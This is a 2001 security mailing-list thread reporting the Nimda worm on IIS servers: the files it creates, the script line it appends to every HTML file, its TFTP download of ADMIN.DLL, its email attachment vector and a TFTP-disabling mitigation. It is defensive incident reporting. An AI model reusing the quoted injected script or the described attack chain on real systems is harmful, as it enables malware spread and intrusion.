-----Original Message----- From: Simon Clausen [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 19, 2001 12:49 AM To: [EMAIL PROTECTED] Subject: Re: Alert: Some sort of IIS worm seems to be propagating Sent on behalf of Rich Zuris ([EMAIL PROTECTED]) due to his network being taken offline by the worm. Following is a list of recorded changes made to NT4 SP6a with Q299444 rollup security patches. The following is appended to EVERY HTML file on the machine: window.open("readme.eml", null, "resizable=no,top=6000,left=6000") Just about every directory on the machine has one or more files with extension .eml, mostly readme.eml but also other names that seem to correspond to directory or other filenames. Total of 1234 .eml files created, totalling 98Mb (about 78Kb each). Also got 55 files with extension .nws, containing exact same content. Both .eml and .nws files can be opened by Outlook Express. Virus makes numerous outbound connections to port 80 to propagate itself to other servers. Virus sets IE5 to IE4 compatibility mode (apparently to circumvent security) and crashes Explorer.exe when IE is launched. IExplore.exe appears to be hacked, and there is now a hidden IExplore .exe (note the space before the extension) in same directory. Virus code in stealth executable file with name tftp###, where ### is any numeric string. File has no extension, but it is definitely a Windows executable. This file is placed into \Program Files\Common Files\System\MSADC, and in same directory, Admin.dll appears to be hacked. IIS console hacked: New MMC.EXE placed in \WINNT directory, which may override original version in \WINNT\System32. EXE files placed into TEMP directory. Note that most/all hacked EXE files are flagged Hidden. Riched20.dll files placed in random directories (not on PATH, not containing executables). NT Account "Guest" was made a member of the NT "Administrators" group! Regards, Simon Clausen -----Original Message----- From: Windows NTBugtraq Mailing List [mailto:[EMAIL PROTECTED]] On Behalf Of Russ Sent: Wednesday, 19 September 2001 1:21 AM To: [EMAIL PROTECTED] Subject: Alert: Some sort of IIS worm seems to be propagating -----BEGIN PGP SIGNED MESSAGE----- There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS. It appears that the attacks can come both from email and from the network. A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.) The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities. One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box. Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP. Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following; edit %systemroot/system32/drivers/etc/services. change the line; tftp 69/udp to; tftp 0/udp thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed. More information as it arises. Cheers, Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.2 iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6 iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO hSW7yN2lhJc= =YAwc -----END PGP SIGNATURE----- ======================================================================== ==== Delivery co-sponsored by Trend Micro, Inc. ======================================================================== ==== TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE If you are worried about email viruses, you need Trend Micro ScanMail for Exchange. ScanMail is the first antivirus solution that seamlessly integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail ensures 100% inbound and outbound email virus scanning and provides remote software management. Download a FREE 30-day trial copy of ScanMail and find out why it is the best: http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 ======================================================================== ==== ============================================================================ Delivery co-sponsored by Trend Micro, Inc. ============================================================================ TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE If you are worried about email viruses, you need Trend Micro ScanMail for Exchange. ScanMail is the first antivirus solution that seamlessly integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail ensures 100% inbound and outbound email virus scanning and provides remote software management. Download a FREE 30-day trial copy of ScanMail and find out why it is the best: http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000 ============================================================================ Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=20360&t=20360 -------------------------------------------------- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]